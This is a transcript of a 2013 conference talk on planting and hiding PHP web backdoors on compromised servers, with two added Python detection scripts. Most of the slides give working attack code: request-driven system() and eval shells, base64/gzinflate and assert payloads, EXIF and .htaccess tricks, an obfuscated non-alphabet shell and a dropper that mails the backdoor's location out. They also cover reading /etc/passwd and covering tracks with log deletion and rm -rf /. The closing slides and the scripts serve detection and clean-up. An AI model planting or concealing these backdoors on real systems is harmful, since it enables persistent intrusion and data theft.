art of web backdoor - pichaya morimoto

Art of Web Backdoor: stealth ways to hide your ass in pwned box
[email protected]
fb.com/index.htmli
linkedin.com/in/pich4ya
Pichaya Morimoto

Upload: pichaya-morimoto

Post on 24-Jun-2015



DESCRIPTION

Topic: Art of Web Backdoor Speaker: Pichaya Morimoto Event: 2600 Thailand Meeting #5 Date: September 6, 2013 Video: https://www.youtube.com/watch?v=QIXTPPBfLyI

TRANSCRIPT

Page 1: Art of Web Backdoor - Pichaya Morimoto

Art of Web Backdoor: stealth ways to hide your ass in pwned box

[email protected]
fb.com/index.htmli
linkedin.com/in/pich4ya

Pichaya Morimoto

Page 2: Art of Web Backdoor - Pichaya Morimoto

Computer-Related Crime Act B.E. 2550 (2007)

Section 5: Whoever illegitimately accesses a computer system that has a specific access-prevention measure not intended for their own use is liable to imprisonment not exceeding 6 months or a fine not exceeding 10,000 baht.

Section 7: Whoever illegitimately accesses computer data that has a specific access-prevention measure not intended for their own use is liable to imprisonment not exceeding 2 years or a fine not exceeding 40,000 baht.

Section 9: Whoever illegitimately damages, destroys, corrects, changes or adds to, in whole or in part, computer data belonging to another person is liable to imprisonment not exceeding 5 years or a fine not exceeding 100,000 baht.

Legal Warning

Page 3: Art of Web Backdoor - Pichaya Morimoto

★ Anatomy of (PHP) Web Hacking
★ Maintaining Access
★ Techniques
★ Covering Tracks
★ Case Studies
★ Detect / Clean up

Overview

Page 4: Art of Web Backdoor - Pichaya Morimoto

OWASP Top Ten 2013

A1 - Injection
A2 - Broken Authentication and Session Management
A3 - Cross-Site Scripting (XSS)
A4 - Insecure Direct Object References
A5 - Security Misconfiguration
A6 - Sensitive Data Exposure
A7 - Missing Function Level Access Control
A8 - Cross-Site Request Forgery (CSRF)
A9 - Using Components with Known Vulnerabilities
A10 - Unvalidated Redirects and Forwards

How do we plant a web backdoor?

High Risk

Medium Risk

Low Risk

Page 5: Art of Web Backdoor - Pichaya Morimoto

Public CMS/Plugins PWN

1. Vulnerability Assessment and Mapping
   ★ Vulnerable version? Vulnerability exists?
   ★ Conditions match? / Known limitations
2. Exploitation
   ★ Public exploit available?
   2.1 Yes - Just use it
       ★ Review & test
   2.2 No - Source code analysis
       ★ Patch file (.diff) / $ diff -ENwbur vul-src/ patched-src/
       ★ Issue tracker (SVN/GIT repo.)
       ★ Public / private vulnerability discussion
3. Zero-Day - for l33t h4x0r!
   ★ Source code analysis without a patch, valuable!

Page 6: Art of Web Backdoor - Pichaya Morimoto

Affected Versions: 2.5.x <= 2.5.13 and 3.x <= 3.1.4
Fixed Date: 2013-July-31 (2.5.14, 3.1.5)

Joomla! - Unauthorised Uploads

Vulnerable files
1. libraries/joomla/filesystem/file.php
2. administrator/components/com_media/helpers/media.php

Scenario
1. Joomla! <= 2.5.13
2. User with author privilege
3. OS = Windows machine, or misconfigured Apache + Linux

Bypassing File Upload Restrictions in Joomla!

Page 7: Art of Web Backdoor - Pichaya Morimoto

Known Issues or Limitations

Page 8: Art of Web Backdoor - Pichaya Morimoto

Backdoor is a Feature for Admin!

Page 9: Art of Web Backdoor - Pichaya Morimoto

Also in IPB, SMF, vBulletin

Page 10: Art of Web Backdoor - Pichaya Morimoto

Latest vBulletin 5.0.4 - PHP Module

Page 11: Art of Web Backdoor - Pichaya Morimoto

http://www.ubuntuforums.org/
★ Hacked on 14 July 2013, defaced on 20 July 2013
★ 1.82 million users' data leaked
★ Attacker had full access to the Forums app servers
★ Servers were running the latest version of vBulletin

Case Study - Official Ubuntu Forums

What happened (posted on the Canonical blog)

● A moderator account was hacked
● The attacker posted an XSS payload to the forum and sent it to an admin
● 31 seconds later, the admin account was PWNED

Page 12: Art of Web Backdoor - Pichaya Morimoto

Invision Power Board <= 3.4.4
Released on 2013/05/13 by @johnjean
Logical vulnerability + bad sanitization

1. Create a new user using [email protected] + [150 spaces] + A

2. MySQL limitation! Strings exceeding 150 characters are truncated, and the value is then trimmed, so an arbitrary user ends up with the same email as the admin and can change the admin's password!

IPB - Bad Sanitization

Page 13: Art of Web Backdoor - Pichaya Morimoto

3rd party components
★ uploadify, ckeditor, ckfinder, tinymce, openx

Shared hosting security
★ Exposed session data
★ Improper user privileges (OS/code execution, critical file manipulation)
★ Vulnerable services (SSH, FTP etc.)

MITM, insider attack, lack of physical access control etc.

Other factors

Page 14: Art of Web Backdoor - Pichaya Morimoto

Add arbitrary accounts (*nix shadow, AD etc.)
Reverse shell and/or bind shell using ...

★ Binary/Script Backdoor
  1. Bind a port to a *nix shell
  2. Send a *nix shell back to the attacker
  3. Make a relay tunnel
  4. Hidden trigger to spawn a shell

★ Web Backdoor - less privileged!
  Connect via HTTP methods & headers (GET/POST etc.)

Maintaining Access

Page 15: Art of Web Backdoor - Pichaya Morimoto

<?php
if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = $_REQUEST['cmd'];
    system($cmd);
    echo "</pre>";
    die();
}
?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

$ curl -d "cmd=cat+/etc/passwd" http://target.com/simple-backdoor.php

Simple PHP Backdoor

Page 16: Art of Web Backdoor - Pichaya Morimoto

Hide your ASS

Page 17: Art of Web Backdoor - Pichaya Morimoto

Passing variables to PHP global vars:

$_GET
$_POST
$_COOKIE
$_REQUEST
$_SERVER['HTTP_CMD']

Communication

$ curl -A- -vvv 127.0.0.1/test1.php -H "Accept_Encoding: @system('uname -a;ps -aux');"

Page 18: Art of Web Backdoor - Pichaya Morimoto

1. Encode (attacker client)
$ php -r "echo base64_encode(gzdeflate('system(\"id\")'));"
K64sLknN1VDKTFHSBAA=

2. Send (attacker client)
$ curl -A- -vvv 127.0.0.1/test3.php -d "cmd=K64sLknN1VDKTFHSBAA="

3. Decode (PHP backdoor)
@eval(gzinflate(base64_decode($_POST["cmd"])));

4. Output
uid=33(www-data) gid=33(www-data) groups=33(www-data)

base64_decode() + gzinflate()

Page 19: Art of Web Backdoor - Pichaya Morimoto

1. assert()

assert('sys' . 'tem(' . $_POST["cmd"] . ')');

$ curl -A- -vvv http://target/evil.php -d "cmd='ls -lha'"

2. preg_replace() with the /e modifier (deprecated in PHP 5.5.0)

preg_replace('/(.*)/e', base64_decode($_POST["cmd"]), '');

$ curl -A- -vvv http://target/evil.php -d "cmd=c3lzdGVtKCdpZCcp"

3. And many more, e.g. OS command execution functions; check out this link:
http://stackoverflow.com/questions/3115559/exploitable-php-functions

Code Evaluation besides eval()
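The two slides above (base64_decode() + gzinflate() and the assert()/preg_replace() variants) show the payload arriving in a request field in one or more encoding layers. The following is an added example, not code from the talk, written from the defender's side: a small triage helper that takes a captured request body and headers, peels base64 and the zlib flavours PHP exposes (gzinflate, gzuncompress, gzdecode) off each value, and reports any field that contains an execution primitive once decoded. The function names (peel, triage_request) and the sample captures are constructed for the example; the captures are modelled on the slides' own curl commands.

```python
"""Triage helper for captured HTTP requests: peel the base64/deflate layers the
slides use and flag PHP execution primitives.  Added example; not from the talk."""
import base64
import binascii
import re
import zlib
from urllib.parse import parse_qs

# Execution primitives named in the talk, matched as whole identifiers.
EXEC_RE = re.compile(r"\b(eval|assert|system|shell_exec|exec|passthru|popen|proc_open|preg_replace)\b")
# Base64 text: alphabet only, at least 8 chars, optional padding.
B64_RE = re.compile(rb"^[A-Za-z0-9+/]{8,}={0,2}$")

# Decoders for binary layers, tried in this order.
BINARY_LAYERS = (
    ("raw-deflate", lambda b: zlib.decompress(b, -15)),            # PHP gzinflate()
    ("zlib", lambda b: zlib.decompress(b)),                        # PHP gzuncompress()
    ("gzip", lambda b: zlib.decompress(b, 16 + zlib.MAX_WBITS)),   # PHP gzdecode()
)


def is_text(data: bytes) -> bool:
    """True when every byte is printable ASCII or ordinary whitespace."""
    return all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def peel(data: bytes, max_depth: int = 8):
    """Strip encoding layers until the payload is readable text.
    Text is only ever treated as base64; binary is tried against the zlib
    flavours PHP exposes.  Returns (payload, [layer names applied])."""
    layers = []
    for _ in range(max_depth):
        if is_text(data):
            data = data.strip()
            if not B64_RE.match(data):
                break                          # readable and not base64: done
            candidates = (("base64", lambda b: base64.b64decode(b, validate=True)),)
        else:
            candidates = BINARY_LAYERS
        for name, decoder in candidates:
            try:
                out = decoder(data)
            except (binascii.Error, ValueError, zlib.error):
                continue
            if out:
                data, layers = out, layers + [name]
                break
        else:
            break                              # nothing decoded: stop peeling
    return data, layers


def triage_request(body: str, headers=None) -> list:
    """Decode every form field and header value of one captured request and
    return those that contain an execution primitive after decoding."""
    fields = [("param:" + k, v)
              for k, vs in parse_qs(body, keep_blank_values=True).items() for v in vs]
    fields += [("header:" + k, v) for k, v in (headers or {}).items()]
    findings = []
    for where, raw in fields:
        payload, layers = peel(raw.encode("latin-1", "replace"))
        text = payload.decode("latin-1")
        calls = sorted(set(EXEC_RE.findall(text)))
        if calls:
            findings.append({"where": where, "payload": text, "layers": layers, "calls": calls})
    return findings


# Constructed captures modelled on the slides' curl examples (not real traffic).
SAMPLE_CAPTURES = [
    ("cmd=K64sLknN1VDKTFHSBAA=", {}),                              # base64(gzdeflate(...))
    ("cmd=c3lzdGVtKCdpZCcp", {}),                                  # plain base64
    ("0=system&1=uname+-a", {}),                                   # $_POST[0]($_POST[1])
    ("", {"Accept_Encoding": "@system('uname -a;ps -aux');"}),    # header channel
    ("q=wordpress+themes", {"Accept-Encoding": "gzip, deflate"}),  # benign request
]

if __name__ == "__main__":
    for body, hdrs in SAMPLE_CAPTURES:
        print(body or hdrs, "->", triage_request(body, hdrs) or "clean")
```

The peel order matters: a readable value is only ever tested as base64, and only binary output is handed to the decompressors, so an ordinary parameter such as a search term is never "inflated" into garbage. The first sample body decodes through base64 and raw deflate back to the slide's `system("id")`; the header sample is caught without any decoding, which is the case a WAF rule keyed on POST parameters alone would miss.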

Page 20: Art of Web Backdoor - Pichaya Morimoto

★ GNU license at the beginning of a PHP file!

/* Copyright (C) 1991 Free Software Foundation, Inc.
This file is part of the GNU C Library.
… */ <?php ...

★ PGP public key!?

/* -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.10 (GNU/Linux)
... */ <?php …

★ The software license prohibits decoding

Stupid trick, but it works!

★ More creative filenames!

○ lndex.php
○ 1ndex.php
○ index2.php
○ wp-manual.php
○ cat.jpg.php
○ license.txt
○ README.md
○ .bash_profile

Page 21: Art of Web Backdoor - Pichaya Morimoto

1. Create EXIF metadata using exiftool

$ exiftool 2600.jpg -Software=system
$ exiftool 2600.jpg -Model=id

2. Put 2600.jpg alongside the backdoor

$A = exif_read_data('2600.jpg');
$A['Software']($A['Model']);

3. Browse to the backdoor and boom!
uid=33(www-data) gid=33(www-data) groups=33(www-data)

PHP: exif_read_data()

Page 22: Art of Web Backdoor - Pichaya Morimoto

1. Apache configuration

AllowOverride All

2. .htaccess

<FilesMatch "2600.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

3. 2600.jpg

<?php @system($_POST["cmd"]); ?>

.htaccess + any file format

Page 23: Art of Web Backdoor - Pichaya Morimoto

<?@$_POST[0]($_POST[1])?>

$ curl -A- "http://target/backdoor.php" -d "0=system&1=uname+-a"

One-statement PHP backdoor

Page 24: Art of Web Backdoor - Pichaya Morimoto

Binary Code in PHP Shell

Page 25: Art of Web Backdoor - Pichaya Morimoto

Binary Code in PHP Shell

Page 26: Art of Web Backdoor - Pichaya Morimoto

<?$_="";$_[+""]='';$_="$_"."";

$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>

<?=${'_'.$_}['_'](${'_'.$_}['__']);?>

$ curl "http://target/backdoor.php?_=shell_exec&__=uname+-a"

*** This code contains non-printable characters; it might not work if you copy & paste! ***

Non-alphabet PHP shell

Page 27: Art of Web Backdoor - Pichaya Morimoto

Works on various types of OS (win/linux/osx) and ISO ??
★ find writable directory
★ read/write file
★ merge into every file
★ merge into backup db / files / zip
★ reverse/bind php shell
★ database client
★ file management (symlink?)
★ av/ids/ips/waf detection
★ credential dumper
★ os command
★ network scanner
★ TCP/UDP/HTTP/DNS amp flood
★ SOCKS proxy for pivoting
★ HTTP proxy, IRC connect back
★ etc.

Common survivor feature!

Page 28: Art of Web Backdoor - Pichaya Morimoto

Exploit Pack

Page 29: Art of Web Backdoor - Pichaya Morimoto

c99
r57
wso
icfdkshell
weevely
ASPsh
msfpayload
use at your own risk!

Free Kiddies Backdoor!

Caution! There are many cases where a backdoor is served inside another backdoor *w*)a
e.g. http://packetstormsecurity.com/files/download/117974/wso2.5.1.zip

$x10="\x6dai\154";
$x0b=$_SERVER["\x53\x45RVE\122_\x4eAM\x45"].$_SERVER["\123\103\x52I\x50\x54_\116\101\115E"];
$x0c="\141r\162a\171\040".$x0b;
$x0d=array("\143\x61","\x6c\x69","\146\x77\162\151\x74\x65","\100","v\x65\x2e");
$x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];
$x0f=@$x10($x0e,$x0c,$x0b);

Decoded:

mail("[email protected]", "target/backdoor.php", "target/backdoor.php");

Page 30: Art of Web Backdoor - Pichaya Morimoto

★ root?
★ logs e.g. /var/log/*
★ history e.g. ~/.bash_history
★ self-destruction
★ rm -rf /

Covering Tracks

Page 31: Art of Web Backdoor - Pichaya Morimoto

★ Follow secure coding guidelines
★ Security hardening checklists
★ Critical file integrity monitoring
★ VA / pentest by certified guys
★ Patch management & patch auditing
★ Centralized log & WAF?

$ iptables -A OUTPUT -m string --algo bm --string 'FilesMan' -j DROP

Detect / Prevent

Page 32: Art of Web Backdoor - Pichaya Morimoto

var_dump(in_array('mod_security2', apache_get_modules()));
print_r(apache_get_modules());

MOD_Security ?

Page 33: Art of Web Backdoor - Pichaya Morimoto

1. Change/reset passwords
2. Review log files
3. Hunt for vulnerable apps/backdoors
4. Backup || Recovery

$ grep - common dangerous functions
$ find
★ newly created files
★ certain conditions (time/date/permission)

Clean up
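The Detect / Prevent and Clean up slides reduce to "grep for dangerous functions, find recently changed files". The block below is an added example, not code from the talk or from any project, that turns the hiding tricks shown earlier (lookalike and double-extension filenames, a license or PGP comment in front of the open tag, the .htaccess SetHandler mapping, exif_read_data() as a call source, header-smuggled commands, the non-alphabet shell and the hex/octal-escaped dropper) into content rules, and adds the slide's find conditions (mtime after a reference time, world-writable) for a real directory walk. Every function name (scan_content, scan_directory, scan_samples), the rule labels and the sample files are constructed for this example; the samples are modelled on the slides, not taken from a real web root.

```python
"""Static triage of a PHP web root for the backdoor patterns shown in the talk.
Added example, not code from the talk or from any project."""
import os
import re

PHP_EXT = (".php", ".phtml", ".php5", ".inc")
PHP_TAG = re.compile(rb"<\?(?!xml)")  # any PHP open tag, but not an XML declaration
ODD_NAME = re.compile(r"^(lndex|1ndex|index\d+)\.php$|\.(jpe?g|png|gif|txt|md)\.php$", re.I)
REQ = rb"\$_(GET|POST|REQUEST|COOKIE|SERVER)"
# (label, regex over file content): heuristics for triage, not proof of compromise
CONTENT_RULES = [
    ("eval/assert on request data", re.compile(rb"\b(eval|assert)\s*\(.*" + REQ, re.S)),
    ("shell function on request data",
     re.compile(rb"\b(system|shell_exec|exec|passthru|popen|proc_open)\s*\(.*" + REQ, re.S)),
    ("decode-then-execute chain",
     re.compile(rb"\b(gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(")),
    ("preg_replace /e", re.compile(rb"preg_replace\s*\(\s*['\"][^'\"]*/[a-zA-Z]*e[a-zA-Z]*['\"]")),
    ("variable function from request", re.compile(rb"\$_(GET|POST|REQUEST|COOKIE)\[[^\]]*\]\s*\(")),
    ("exif metadata used as code", re.compile(rb"exif_read_data\s*\(")),
    ("command smuggled in an HTTP header", re.compile(rb"\$_SERVER\[\s*['\"]HTTP_")),
    ("known shell marker", re.compile(rb"FilesMan|c99sh|r57shell")),
    ("hex/octal-escaped identifiers", re.compile(rb"(\\x[0-9a-fA-F]{2}|\\[0-7]{3}){4,}")),
]


def alnum_ratio(data: bytes) -> float:
    """Share of non-whitespace bytes that are ASCII letters or digits: real PHP
    sits well above 0.5, the talk's non-alphabet shell close to 0."""
    body = [b for b in data if not chr(b).isspace()]
    return sum(b < 128 and chr(b).isalnum() for b in body) / len(body) if body else 1.0


def scan_content(path: str, data: bytes) -> list:
    """Return the labels of every rule that fires for one file."""
    name = os.path.basename(path)
    has_php = PHP_TAG.search(data) is not None
    hits = []
    if name == ".htaccess" and re.search(rb"(SetHandler|AddHandler|AddType)\s+application/x-httpd-php", data):
        hits.append(".htaccess maps other files to the PHP handler")
    if has_php and name != ".htaccess" and not name.lower().endswith(PHP_EXT):
        hits.append("PHP open tag in a non-PHP file")
    if ODD_NAME.search(name):
        hits.append("lookalike or double-extension filename")
    if has_php and data.lstrip().startswith(b"/*"):
        hits.append("comment block placed before the PHP open tag")
    if has_php and len(data) > 40 and alnum_ratio(data) < 0.4:
        hits.append("very low alphanumeric ratio (obfuscated code)")
    hits += [label for label, rx in CONTENT_RULES if rx.search(data)]
    return hits


def scan_directory(root: str, modified_since: float = 0.0) -> dict:
    """Walk a real web root and add the slide's 'find' conditions: files newer
    than modified_since (epoch seconds) and world-writable files."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                st = os.stat(path)
                with open(path, "rb") as fh:
                    hits = scan_content(path, fh.read(1_000_000))
            except OSError:
                continue
            if st.st_mtime > modified_since:
                hits.append("modified after the reference time")
            if st.st_mode & 0o002:
                hits.append("world-writable")
            if hits:
                report[path] = hits
    return report


# Constructed sample files modelled on the slides (not real web root contents).
SAMPLES = {
    "wp-config.php": b"<?php\n// benign config\ndefine('DB_NAME', 'wp');\n$table_prefix = 'wp_';\nrequire_once ABSPATH . 'wp-settings.php';\n",
    "cat.jpg.php": b"<?php\nif(isset($_REQUEST['cmd'])){ echo '<pre>'; system($_REQUEST['cmd']); echo '</pre>'; die(); }\n",
    "license.txt": b"/* Copyright (C) 1991 Free Software Foundation, Inc.\n   This file is part of the GNU C Library. */\n<?php preg_replace('/(.*)/e', base64_decode($_POST['cmd']), '');\n",
    "backdoor.php": b"<?@$_POST[0]($_POST[1])?>",
    ".htaccess": b'<FilesMatch "2600.jpg">\nSetHandler application/x-httpd-php\n</FilesMatch>\n',
    "2600.jpg": b"<?php @system($_POST['cmd']); ?>",
    "index2.php": rb'''<?$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>''',
    "wso.php": rb'<?php $x10="\x6dai\154";$x0d=array("\143\x61","\x6c\x69","\146\x77\162\151\x74\x65","\100","v\x65\x2e");',
}


def scan_samples() -> dict:
    """Apply the content rules to the constructed samples; returns {name: hits}."""
    return {name: scan_content(name, data) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    import sys
    report = scan_directory(sys.argv[1]) if len(sys.argv) > 1 else scan_samples()
    for path, hits in report.items():
        print(path, "->", "; ".join(hits) if hits else "clean")
```

Run it with a directory argument to walk a real web root, or without one to see the rules fire on the samples. The rules are deliberately coarse: a hit is a file to read, not a verdict, and the benign config sample shows why the filename and ratio checks are kept separate from the function-name checks. The alphanumeric-ratio rule is the one check here that catches the non-alphabet shell, which contains none of the function names a grep would look for.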